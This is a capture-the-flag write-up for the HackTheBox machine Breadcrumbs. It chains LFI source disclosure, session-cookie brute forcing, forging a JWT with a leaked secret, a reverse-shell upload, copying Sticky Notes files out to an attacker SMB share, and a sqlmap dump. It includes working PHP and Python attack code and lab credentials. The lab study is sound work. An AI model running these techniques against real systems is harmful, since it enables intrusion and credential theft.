
HackTheBox - Breadcrumbs Writeup

Information Gathering


Nmap scan

sudo nmap -sC -sV 10.10.10.228 -v
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 9d:d0:b8:81:55:54:ea:0f:89:b1:10:32:33:6a:a7:8f (RSA)
|   256 1f:2e:67:37:1a:b8:91:1d:5c:31:59:c7:c6:df:14:1d (ECDSA)
|_  256 30:9e:5d:12:e3:c6:b7:c6:3b:7e:1e:e7:89:7e:83:e4 (ED25519)
80/tcp   open  http          Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1
|_http-title: Library
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)

The open ports fall into three groups:

  • SSH (22)
  • Webserver on 80/443 (Apache with PHP 8.0.1; note the PHPSESSID cookie is set without the httponly flag)
  • Windows RPC/NetBIOS (135/139), i.e. SMB

Web Enumeration

Let’s take a look at both ports 80/443. They serve the same pages, so we can work with either one.


Seems like it’s an e-book library


We have a search page for books; let’s play with it a bit.


I tried a few manual enumerations but nothing seemed to give me an interesting output!

Let’s capture the request with Burp Suite to see what’s actually going on.


Aside from the title and author parameters we have “method=0”, which seems odd.

Let’s send the request to Repeater and change it to “method=1”.


We get a different and much more interesting response: an error that screams “local file inclusion” and also leaks a parameter named “book”. Let’s check whether that parameter works.


And yes! We have an LFI. We don’t know of anything interesting to read yet, so let’s keep enumerating the web root to find files worth including:

gobuster dir -u http://10.10.10.228/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x asp,aspx,php

-x appends the given extensions to every wordlist entry; since this is a Windows box we may find asp/aspx files alongside php. The lowercase wordlist is enough because Windows paths are not case sensitive, so uppercase variants would only hit the same files again.


Seems like we have a login panel under /portal/.

Since we’re looking for files to read, we’re not going to do anything with the login panel yet. Let’s run gobuster again, this time against /portal/:

gobuster dir -u http://10.10.10.228/portal -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x asp,aspx,php


Let’s check all of these.

/includes/

/php/

Here we have a list of users. Let’s take note of them and save them somewhere in case we need them later.


Foothold


Let’s not waste more time and read the files under /includes/, and also cookie.php under /portal/, through our LFI.

includes/fileController.php


We get the JWT secret:

$secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e'

Another interesting thing in the response (still raw, with the escaped quotes the LFI output contains):

if(in_array($user, $admins) && $_SESSION['username'] == \"paul\")

Seems like we need to be logged in as the user paul.

Let’s check cookie.php.


If we clean up the response with a quick sed to strip the escaped \r, \n and \" sequences, we get:

<?php
/**
 * @param  string $username        Username requesting session cookie
 * @return string $session_cookie  Returns the generated cookie
 *
 * @devteam
 * Please DO NOT use default PHPSESSID; our security team says they are predictable.
 * CHANGE SECOND PART OF MD5 KEY EVERY WEEK
 **/

function makesession($username){
    // The right-hand side of this assignment was lost in the LFI output.
    // strlen($username) - 1 is the only value consistent with $username[$seed]
    // below (and with the brute-force script later in this post): the "random"
    // seed is just an index into the username.
    $max = strlen($username) - 1;
    $seed = rand(0, $max);
    $key = "s4lTy_stR1nG_".$username[$seed]."(!528./9890";
    $session_cookie = $username.md5($key);
    return $session_cookie;
}
?>

We know the username is “paul”, and the only randomness in makesession() is which character of that username gets concatenated into the MD5 key. That means there are at most strlen("paul") = 4 possible cookies, so we can generate all of them and try each until one works:

<?php
$user = "paul";
// rand(0, $max) can only pick one character of the username, so iterating
// over every index of the name enumerates every cookie the portal could issue.
for ($seed = 0; $seed <= strlen($user) - 1; $seed++) {
    $key = "s4lTy_stR1nG_".$user[$seed]."(!528./9890";
    $session_cookie = $user.md5($key);
    echo "[+] Cookie : ".$session_cookie."\n";
}
?>
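The same enumeration in Python, as an added example that is not part of the original post. It deduplicates candidates (the keyspace is the set of distinct characters in the username, so it can be even smaller than strlen) and wraps the trial loop in a function that takes a probe callback, because the cookie name and the check the portal performs are not shown on this page and are left as assumptions for the caller to supply (for instance a requests.get to /portal/ that no longer redirects to the login page).

```python
import hashlib

# Constants copied from the leaked cookie.php above.
PREFIX = "s4lTy_stR1nG_"
SUFFIX = "(!528./9890"


def candidate_cookies(username):
    """Return every session cookie makesession() can produce for `username`.

    The only randomness is rand(0, strlen($username) - 1), which selects ONE
    character of the username, so the number of distinct cookies equals the
    number of distinct characters in the name (4 for "paul", 2 for "anna"),
    not the 2^128 an MD5 suffix might suggest.
    """
    seen = set()
    cookies = []
    for ch in username:
        if ch in seen:
            continue  # repeated character -> identical key -> identical cookie
        seen.add(ch)
        key = PREFIX + ch + SUFFIX
        cookies.append(username + hashlib.md5(key.encode()).hexdigest())
    return cookies


def find_valid_cookie(username, probe):
    """Try each candidate in turn.

    `probe(cookie)` is supplied by the caller and must return True when the
    portal accepts the cookie (assumption: the page does not show the cookie
    name or the logged-in check, so the HTTP part is deliberately left out).
    Returns the accepted cookie, or None if every candidate was rejected.
    """
    for cookie in candidate_cookies(username):
        if probe(cookie):
            return cookie
    return None


if __name__ == "__main__":
    for c in candidate_cookies("paul"):
        print("[+] Cookie :", c)
```

The point of the probe abstraction is that the whole attack is four HTTP requests; a "random" seed whose range is the length of the username gives no meaningful entropy no matter how strong the hash behind it is.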


Let’s try them one by one and check whether we can get in.


And we’re in!

Nothing interesting on the Issues page.

Let’s check the File management page.

Let’s try to upload anything to see if it works.

Seems like we need a token! We have the secret, but we haven’t yet checked what data the token is expected to carry. Let’s look at the relevant part of the fileController.php response again:

$ret = JWT::decode($jwt, $secret_key, array('HS256'));
return $ret;
if($_SERVER['REQUEST_METHOD'] === "POST"){
  $admins = array("paul");
  $user = validate()->data->username;

The token is decoded with HS256 and the leaked $secret_key, and the username is read from ->data->username, so the JWT payload should be:

{"data":{"username":"paul"}}

Now we have everything we need; let’s forge our token. We can use either Python or jwt.io (algorithm HS256, with the leaked secret as the signing key):

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.4mJguG8tRd2z_feWJpmr_J3AdMeDPvW7GCK7cW7o0AI
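Forging the token without any JWT library, as an added example that is not the author’s script: HS256 is just HMAC-SHA256 over base64url(header) + "." + base64url(payload), keyed with the leaked secret used as a plain string, which is how php-jwt (and jwt.io with the default settings) treat it. With compact JSON the header and payload segments come out identical to the token above. verify_hs256 mirrors what the server-side JWT::decode($jwt, $secret_key, array('HS256')) check does and is included to show why leaking $secret_key is fatal: whoever holds it can mint any claims, including data.username = paul.

```python
import base64
import hashlib
import hmac
import json

# Secret leaked through the LFI from fileController.php (see above).
SECRET_KEY = "6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e"


def b64url(data):
    """Base64url without padding, as RFC 7515 requires for JWT segments."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(segment):
    """Inverse of b64url: re-add the padding SQLite-style libraries strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def forge_hs256(claims, secret):
    """Build a JWT signed with HMAC-SHA256 using the (leaked) secret.

    Segments are compact JSON with no whitespace, which is what php-jwt and
    jwt.io emit, so header and payload match the token in the post byte for byte.
    """
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url(json.dumps(claims, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_hs256(token, secret):
    """Return the decoded claims if the HS256 signature checks out, else None.

    This is the server's side of the exchange: recompute the MAC over
    header.payload and compare it in constant time. It also refuses any
    other 'alg' so a forged header cannot downgrade the check.
    """
    try:
        h, p, s = token.split(".")
    except ValueError:
        return None
    try:
        header = json.loads(b64url_decode(h))
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    token = forge_hs256({"data": {"username": "paul"}}, SECRET_KEY)
    print(token)
    print(verify_hs256(token, SECRET_KEY))
```

Run it and compare the first two dot-separated segments with the token above; the third segment is the MAC, and it only verifies against the exact secret string, which is why rotating that constant after a source-code leak is the fix, not a longer secret.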

Let’s add the token to our browser’s cookies.

Let’s try to import something again.

It worked!

Let’s upload the reverse shell!

And we’re in.


Juliette User PrivESC


As usual, before running any enumeration tool we can check the webpage source to see if something is hidden there!

We can see an interesting folder under /portal/.

We have a few files for users. Let’s check whether any of them contains a password:

Get-ChildItem | Select-String 'password'

And we get creds for the user juliette:

juliette:jUli901./())!

Let’s try to SSH into the box with these creds.


Development User PrivESC


In juliette’s Desktop we can find an interesting file, todo.html.

Seems like we need the passwords that are stored in Sticky Notes. According to a quick Google search they should be located under the user’s AppData folder, so let’s search for it:

Get-ChildItem *Sticky* -Recurse

We found a directory:

C:\users\juliette\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\

It contains more folders; \LocalState\ seems interesting!

Let’s copy these files to our machine. First we start our SMB server:

python3 /usr/share/doc/python3-impacket/examples/smbserver.py -ip 10.10.14.6 -smb2support euch .

and copy the files:

copy * \\10.10.14.6\euch

Let’s check the files. The only one we need is plum.sqlite-wal: it is SQLite’s write-ahead log, holding pages that were written recently and not yet checkpointed into plum.sqlite, which is why the freshest note text lives there rather than in the main database file.

It contains the creds for the development user:

\id=fc0d8d70-055d-4870-a5de-d76943a68ea2 development: fN3)sN5Ee@g
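Rather than grepping the raw WAL, the copied database can be opened with sqlite3, which replays plum.sqlite-wal automatically as long as it sits next to plum.sqlite. The following is an added example, not from the original post. It assumes the Sticky Notes schema (a Note table with a Text column whose body starts with \id=<guid>, consistent with the line above) and builds a constructed sample database with made-up GUIDs so it runs offline; the "development" line is modelled on the note found on the box.

```python
import os
import re
import sqlite3
import tempfile

# Sticky Notes prefixes each note body with "\id=<guid> " (assumed schema,
# consistent with the raw WAL line in the post).
ID_PREFIX = re.compile(r"^\\id=([0-9a-f-]{36})\s*(.*)$", re.DOTALL)
# A note line that looks like "user: password" or "user=password".
CRED = re.compile(r"^\s*([A-Za-z0-9._-]+)\s*[:=]\s*(\S+)\s*$")


def read_notes(db_path):
    """Return (guid, text) for every note in a copied plum.sqlite.

    Copy plum.sqlite together with plum.sqlite-wal and plum.sqlite-shm; on
    open SQLite replays the WAL, so notes that only exist there are visible.
    Work on the copy, never on the live file.
    """
    conn = sqlite3.connect(db_path)
    try:
        rows = conn.execute("SELECT Text FROM Note").fetchall()
    finally:
        conn.close()
    notes = []
    for (text,) in rows:
        m = ID_PREFIX.match(text or "")
        notes.append(m.groups() if m else (None, text))
    return notes


def extract_credentials(db_path):
    """Return {username: password} for every note line shaped like user: pass."""
    creds = {}
    for _guid, text in read_notes(db_path):
        for line in (text or "").splitlines():
            m = CRED.match(line)
            if m:
                creds[m.group(1)] = m.group(2)
    return creds


def make_sample_db():
    """Constructed plum.sqlite with two notes (sample data, not from the box)."""
    path = os.path.join(tempfile.mkdtemp(), "plum.sqlite")
    conn = sqlite3.connect(path)
    conn.execute("PRAGMA journal_mode=WAL")  # same journaling mode Sticky Notes uses
    conn.execute("CREATE TABLE Note (Id TEXT, Text TEXT)")
    conn.executemany("INSERT INTO Note VALUES (?, ?)", [
        ("n1", "\\id=11111111-2222-3333-4444-555555555555 development: fN3)sN5Ee@g"),
        ("n2", "\\id=66666666-7777-8888-9999-000000000000 shopping list\nmilk\neggs"),
    ])
    conn.commit()
    conn.close()
    return path


if __name__ == "__main__":
    sample = make_sample_db()
    for guid, text in read_notes(sample):
        print(guid, repr(text))
    print(extract_credentials(sample))
```

Point read_notes at the real copy to get the same output for the box; the second sample note shows that the \id= prefix is stripped even for multi-line notes and that non-credential notes are simply ignored.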

Let’s try to SSH in with these creds.


Root User PrivESC


Now that we’re logged in as development, we can check what’s inside C:\Development\.

Let’s copy it to our machine:

copy Krypter_Linux \\10.10.14.6\euch

It’s a Linux executable. Before going deeper into the binary it’s worth running strings or rabin2 -z to pull out the printable strings.

What stands out in the output is port 1234:

http://passmanager.htb:1234/index.php

We also have the GET parameters the binary sends:

method=select&username=administrator&table=passwords

Seems like the service is only reachable from the box itself!

Let’s forward it to our machine over SSH:

ssh -L 1234:127.0.0.1:1234 development@10.10.10.228

The parameter names (method=select, table=passwords, username=...) strongly suggest the values are fed into a SQL query, so let’s point sqlmap at the forwarded port:

sqlmap -u "http://127.0.0.1:1234/?method=select&username=administrator&table=passwords" --dump

We get the administrator’s password, but it’s encrypted (AES).

Let’s use CyberChef to decrypt it.

When I first did the machine, I overthought this part; I thought that I needed to find the IV somewhere on the machine.

And now let’s try to ssh into the box as the administrator and grab the flag!

This post is licensed under CC BY 4.0 by the author.